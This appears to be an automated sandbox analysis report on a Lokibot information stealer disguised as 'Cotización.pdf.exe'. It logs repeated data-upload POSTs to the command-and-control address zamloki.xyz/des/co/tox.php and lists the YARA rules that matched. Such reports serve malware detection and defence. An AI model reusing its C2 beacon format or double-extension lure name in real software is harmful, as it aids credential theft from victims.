                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00404ED4 recv,16_2_00404ED4
                Source: unknownDNS traffic detected: queries for: zamloki.xyz
                Source: unknownHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 15 Jul 2021 10:43:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UtkG5wpiD%2F39c8b7n4kaE%2FNjjz%2FBg3gKdVgGRzXN7iIbRlKskSNIhlBnfCTz8kVwtZbZgK0RonfV5wGfYj9GDZNJdxqTxagwVfZjl4sYIsLo4YH7t2RMaK%2F2Tstsig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66f26450793b1762-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296183312.0000000001B77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296183312.0000000001B77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.comD8
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Cotizaci#U00f3n.pdf.exe, Cotizaci#U00f3n.pdf.exe, 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.300266422.0000000006430000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: Cotizaci#U00f3n.pdf.exe, 00000010.00000002.466695210.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: https://zamloki.xyz/des/co/tox.php

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Initial sample is a PE file and has a suspicious nameShow sources
                Source: initial sampleStatic PE information: Filename: Cotizaci#U00f3n.pdf.exe
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD47680_2_07AD4768
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADE2B00_2_07ADE2B0
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD9EE80_2_07AD9EE8
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD5E200_2_07AD5E20
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADB2600_2_07ADB260
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD058F0_2_07AD058F
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADDDD00_2_07ADDDD0
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD6D480_2_07AD6D48
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADE0900_2_07ADE090
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD2C300_2_07AD2C30
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD7BB10_2_07AD7BB1
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD8FC80_2_07AD8FC8
